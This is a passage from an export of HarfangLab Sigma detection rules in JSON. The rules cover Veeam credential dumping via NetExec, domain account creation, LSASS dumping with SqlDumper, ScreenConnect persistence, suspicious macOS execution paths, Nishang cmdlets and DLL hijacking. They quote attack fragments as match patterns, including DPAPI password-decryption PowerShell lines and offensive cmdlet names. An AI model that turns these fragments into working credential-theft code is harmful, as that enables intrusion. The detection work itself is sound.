"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073236Z",
"creation_date": "2026-03-23T11:45:34.073238Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073242Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_mssql.ps1",
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1",
"https://attack.mitre.org/techniques/T1555/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1555_netexec_veeam_password.yml",
"content": "title: Veeam Password Dumped via NetExec\nid: eab58a58-82b3-49a7-b89d-65ed296ee5ef\ndescription: |\n Detects common PowerShell script commands used by NetExec for dumping Veeam credentials.\n Veeam is a backup solution often targeted by attackers due to its use of highly privileged accounts.\n NetExec is a tool commonly used by adversaries to facilitate lateral movement, internal reconnaissance, and credential gathering actions.\n The dumping of credentials could indicate an attempt to compromise Veeam's privileged access for further network traversal or backup destruction.\n It is recommended to investigate the actions performed by the child process to determine if they are legitimate and review authentication logs to identify the source of the remote connection.\n Additionally, consider reviewing Veeam's configuration and permissions to ensure they are secure and align with organizational policies.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_mssql.ps1\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1\n - https://attack.mitre.org/techniques/T1555/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'Add-Type -assembly System.Security'\n - '#Decrypting passwords using DPAPI'\n - '$rows | ForEach-Object -Process {'\n - '$EnryptedPWD = 
[Convert]::FromBase64String($_.password)'\n - '$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )'\n - '$enc = [system.text.encoding]::Default'\n - '$_.password = $enc.GetString($ClearPWD)'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eab58a58-82b3-49a7-b89d-65ed296ee5ef",
"rule_name": "Veeam Password Dumped via NetExec",
"rule_description": "Detects the PowerShell script fragments used by NetExec's Veeam module to read stored Veeam credentials from the backing database and decrypt them with DPAPI (LocalMachine scope).\nVeeam is a backup solution often targeted by attackers due to its use of highly privileged accounts.\nNetExec is a tool commonly used by adversaries to facilitate lateral movement, internal reconnaissance, and credential gathering actions.\nThe dumping of credentials could indicate an attempt to compromise Veeam's privileged access for further network traversal or backup destruction.\nThe rule matches several literal lines of the NetExec script, so a modified or re-implemented script would not trigger it; correlate with other credential-access and lateral-movement detections.\nIt is recommended to investigate the actions performed by the child process to determine if they are legitimate and review authentication logs to identify the source of the remote connection.\nAdditionally, consider reviewing Veeam's configuration and permissions to ensure they are secure and align with organizational policies.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eaba0d6e-91a2-4932-8dd6-3f4126ec4d7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072586Z",
"creation_date": "2026-03-23T11:45:34.072588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072593Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/002/"
],
"name": "t1136_net_create_domain_account.yml",
"content": "title: Domain User Account Created via net.exe\nid: eaba0d6e-91a2-4932-8dd6-3f4126ec4d7b\ndescription: |\n Detects the creation of a domain user account via net1.exe.\n Adversaries may create a domain account to maintain access to victim systems.\n It is recommended to check the legitimacy of this action and that it is carried out by an authorized administrator.\nreferences:\n - https://attack.mitre.org/techniques/T1136/002/\ndate: 2023/03/08\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.002\n - attack.initial_access\n - attack.t1078.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_args:\n CommandLine|contains|all:\n - ' user'\n - '/add'\n - '/domain'\n\n exclusion_dir:\n - CurrentDirectory|endswith: '\\copssh\\home\\syncldap\\'\n - Username|endswith: '\\syncldap'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eaba0d6e-91a2-4932-8dd6-3f4126ec4d7b",
"rule_name": "Domain User Account Created via net.exe",
"rule_description": "Detects the creation of a domain user account via net1.exe (the helper binary that net.exe invokes), including renamed copies identified by their original file name.\nAdversaries may create a domain account to maintain access to victim systems.\nIt is recommended to confirm that the action was carried out by an authorized administrator through an approved process and, if not, to disable the new account and review its group memberships.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078.002",
"attack.t1136.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eadf1fb9-7a50-4c8c-ae23-1a7034cdb55c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087193Z",
"creation_date": "2026-03-23T11:45:34.087195Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087199Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_sqldumper.yml",
"content": "title: LSASS Process Memory Dumped via SqlDumper.exe\nid: eadf1fb9-7a50-4c8c-ae23-1a7034cdb55c\ndescription: |\n Detects an attempt to dump the LSASS' process memory using SqlDumper.exe.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine stolen credentials.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/07/21\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.SqlDumper\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n ProcessOriginalFileName: 'SqlDumper.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eadf1fb9-7a50-4c8c-ae23-1a7034cdb55c",
"rule_name": "LSASS Process Memory Dumped via SqlDumper.exe",
"rule_description": "Detects an attempt to dump the memory of the LSASS process using SqlDumper.exe, a Microsoft utility listed by the LOLBAS project that can be abused as a living-off-the-land binary.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host, locate and secure any dump file that was written, and start memory forensics to determine which credentials were exposed.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eae16484-81b2-44df-893e-fa3bbad6136d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071985Z",
"creation_date": "2026-03-23T11:45:34.071987Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071991Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/",
"https://attack.mitre.org/techniques/T1543/003/",
"https://attack.mitre.org/software/S0591/"
],
"name": "t1543_003_suspicious_screenconnect_service.yml",
"content": "title: ScreenConnect Persistent Service Created\nid: eae16484-81b2-44df-893e-fa3bbad6136d\ndescription: |\n Detects the creation of a service registry key associated with a ScreenConnect guest beacon.\n Attackers often use ScreenConnect as a remote access tool both for its simplicity and stealth as a legitimate application.\n ScreenConnect can be installed in unattended mode in which it creates a service for persistence across reboots.\n It is recommended to analyze actions performed by the ScreenConnect binary as well as to check whether its presence is legitimate.\nreferences:\n - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\n - https://attack.mitre.org/techniques/T1543/003/\n - https://attack.mitre.org/software/S0591/\ndate: 2024/07/15\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.command_and_control\n - attack.t1219.002\n - attack.s0591\n - classification.Windows.Source.Registry\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: registry_event\n product: windows\ndetection:\n selection:\n TargetObject|endswith: '\\\\*ControlSet*\\Services\\\\*\\ImagePath'\n Details|contains|all:\n - 'ScreenConnect.ClientService.exe'\n - 'e=Access'\n - 'y=Guest'\n - 'h='\n\n exclusion_windowssetup:\n ProcessImage:\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eae16484-81b2-44df-893e-fa3bbad6136d",
"rule_name": "ScreenConnect Persistent Service Created",
"rule_description": "Detects the creation of a service ImagePath registry value pointing to ScreenConnect.ClientService.exe with the access-session parameters (e=Access, y=Guest, h=) used by a ScreenConnect guest client.\nAttackers often use ScreenConnect as a remote access tool both for its simplicity and stealth as a legitimate application.\nScreenConnect can be installed in unattended mode, in which case it creates a service for persistence across reboots.\nIt is recommended to check whether this ScreenConnect instance and the host referenced by the h= parameter are sanctioned by the organization, and to analyze actions performed by the ScreenConnect binary.\n",
"rule_creation_date": "2024-07-15",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1219.002",
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eafcd13f-3580-42be-8cb8-c6181e0313be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618033Z",
"creation_date": "2026-03-23T11:45:34.618035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618040Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/operation-applejeus/87553/",
"https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_folder_execution_macos.yml",
"content": "title: Process Executed From a Suspicious Folder (macOS)\nid: eafcd13f-3580-42be-8cb8-c6181e0313be\ndescription: |\n Detects execution of a process from a suspicious folder.\n Adversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://securelist.com/operation-applejeus/87553/\n - https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/05/15\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_bin:\n ProcessImage|re:\n - '^(?i)/private/var/[^/]*$'\n - '^(?i)/private/tmp/[^/]*$'\n - '^(?i)/private/etc/.*'\n - '^(?i)/private/var/root/.*'\n\n # selection_shell:\n # ProcessImage:\n # - '/bin/bash'\n # - '/bin/sh'\n # - '/bin/zsh'\n\n # selection_shell_cwd:\n # CommandLine|re:\n # - (?i)/private/tmp/[^/'\" ]*$\n # - '(?i)/private/tmp/[^/]+ *$'\n # - '(?i)/private/tmp/[^/]+\"$'\n # - \"(?i)/private/tmp/[^/]+'$\"\n\n exclusion_air_engine:\n # https://github.com/air-verse/air/\n ProcessImage: '/private/tmp/engine'\n ProcessParentImage|endswith: '/go/bin/air'\n\n exclusion_p5sys_jump:\n ProcessImage|startswith: '/private/var/root/library/caches/com.p5sys.jump.connect/org.sparkle-project.sparkle/jump desktop connect (autoupdate).app/contents/macos/'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '/Library/ManageEngine/UEMS_Agent/bin/dcagentservice'\n\n exclusion_meraki:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.meraki.m_agent'\n\n exclusion_adobe:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 
'com.adobe.AdobeResourceSynchronizer'\n\n exclusion_forti:\n - Image:\n - '/private/etc/FortiClient/upgrade/fcdeployd'\n - '/private/etc/fct_upgrade/SendFailureReport'\n - ParentImage: '/private/etc/FortiClient/upgrade/fcdeployd'\n\n exclusion_cursor:\n GrandparentCommandLine|startswith: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin) --type=utility '\n\n exclusion_studio_code:\n GrandparentCommandLine|startswith: '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper --type=utility '\n\n condition: selection_bin and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eafcd13f-3580-42be-8cb8-c6181e0313be",
"rule_name": "Process Executed From a Suspicious Folder (macOS)",
"rule_description": "Detects execution of a process located directly in /private/var or /private/tmp, or anywhere under /private/etc or /private/var/root.\nAdversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\nIt is recommended to check the executed binary (origin and code signature) and its parent and child processes for malicious behavior.\n",
"rule_creation_date": "2024-05-15",
"rule_modified_date": "2025-10-13",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eb11687b-d8b4-4ee5-bff4-32c03dd6e493",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606822Z",
"creation_date": "2026-03-23T11:45:34.606825Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/samratashok/nishang",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_nishang_script.yml",
"content": "title: Malicious PowerShell Nishang Commandlets\nid: eb11687b-d8b4-4ee5-bff4-32c03dd6e493\ndescription: |\n Detects various malicious commandlets in PowerShell's command-line, generally associated with the Nishang framework.\n Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.\n It is recommended to investigate actions performed by attackers using the Nishang framework and to isolate infected systems.\nreferences:\n - https://github.com/samratashok/nishang\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - attack.collection\n - attack.t1115\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Framework.Nishang\n - classification.Windows.Script.PowerShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Add-ScrnSaveBackdoor '\n - 'Gupt-Backdoor '\n - 'Invoke-ADSBackdoor '\n - 'Enabled-DuplicateToken '\n - 'Invoke-PsUaCme '\n - 'Remove-Update '\n - 'Get-LSASecret '\n - 'Get-PassHashes '\n - 'Show-TargetScreen '\n - 'Port-Scan '\n - 'Invoke-PoshRatHttp '\n - 'Invoke-PoshRatHttps '\n - 'Invoke-PowerShellTCP '\n - 'Invoke-PowerShellWMI '\n - 'Add-Exfiltration '\n - 'Add-Persistence '\n - 'Do-Exfiltration '\n - 'Start-CaptureServer '\n - 'Get-ChromeDump '\n - 'Get-ClipboardContents '\n - 'Invoke-Mimikittenz '\n - 'Invoke-PowerShellIcmp '\n\n exclusion_sentinelone:\n PowershellCommand|contains|all:\n - ':::::\\windows\\sentinel\\'\n - '<#sentinelbreakpoints#>'\n - 'Add-Persistence'\n\n exclusion_aadinternals:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AADInternals\\0.6.8\\AADSyncSettings.ps1\n # C:\\Program 
Files\\WindowsPowerShell\\Modules\\AADInternals\\0.6.8\\AADInternals.psd1\n PowershellScriptPath|startswith: '?:\\Program Files\\WindowsPowerShell\\Modules\\AADInternals\\'\n PowershellCommand|contains|all:\n - '$LSASecret=Get-LSASecrets -Users'\n - '_SC_ADSync'\n - '$password=$LSASecret.PasswordTxt'\n\n exclusion_tanium:\n ProcessImage: '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eb11687b-d8b4-4ee5-bff4-32c03dd6e493",
"rule_name": "Malicious PowerShell Nishang Commandlets",
"rule_description": "Detects PowerShell commands and script blocks containing cmdlet names associated with the Nishang framework (for example Get-PassHashes, Invoke-PowerShellTCP or Add-Persistence).\nNishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.\nEach cmdlet name is matched followed by a space, so an invocation with arguments is required for the rule to trigger.\nIt is recommended to investigate actions performed using the Nishang framework and to isolate affected systems.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1095",
"attack.t1115"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebb3b1b1-bbf2-4e68-ae36-1c51d1aacb09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098420Z",
"creation_date": "2026-03-23T11:45:34.098422Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098427Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iscsicli.yml",
"content": "title: DLL Hijacking via iscsicli.exe\nid: ebb3b1b1-bbf2-4e68-ae36-1c51d1aacb09\ndescription: |\n Detects potential Windows DLL Hijacking via iscsicli.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iscsicli.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ISCSIDSC.dll'\n - '\\ISCSIUM.dll'\n - '\\WMICLNT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebb3b1b1-bbf2-4e68-ae36-1c51d1aacb09",
"rule_name": "DLL Hijacking via iscsicli.exe",
"rule_description": "Detects potential Windows DLL Hijacking via iscsicli.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebb95111-6046-42fa-a44e-b9fedef79771",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600890Z",
"creation_date": "2026-03-23T11:45:34.600893Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_filehistory.yml",
